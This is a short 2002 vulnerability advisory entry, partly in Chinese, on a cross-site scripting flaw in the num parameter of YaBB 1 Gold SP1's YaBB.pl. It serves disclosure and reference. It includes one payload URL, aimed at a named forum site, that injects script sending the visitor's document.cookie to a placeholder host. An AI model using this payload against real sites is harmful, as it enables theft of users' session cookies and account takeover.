https://www.exploit-db.com/exploits/22052
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-162

YetAnotherBulletinBoard(YaBB)1GoldSP1版本的YaBB.pl存在跨站脚本漏洞。远程攻击者借助num参数插入任意web脚本或者HTML。

source: http://www.securityfocus.com/bid/6272/info

A cross-site scripting vulnerability has been reported in the YaBB forum. This vulnerability is due to insufficient sanitization of URI parameters in some scripts.

As a result, it is possible for a remote attacker to create a malicious link to the login page of a site hosting the web forum. When this link is visited by an unsuspecting web user, the attacker-supplied code will be executed in their browser in the security context of the vulnerable website.

It has been demonstrated that this vulnerability may be exploited to steal cookie-based authentication credentials.

http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'
%2b(document.cookie)%3b</Script>

来源:XF
名称:yabb-xphp-xss(10737)
链接:http://xforce.iss.net/xforce/xfdb/10737
来源:BID
名称:6272
链接:http://www.securityfocus.com/bid/6272
来源:BUGTRAQ
名称:20021201Cross-siteScriptingVulnerabilityinYaBB1Gold-SP1!
链接:http://archives.neohapsis.com/archives/bugtraq/2002-12/0003.html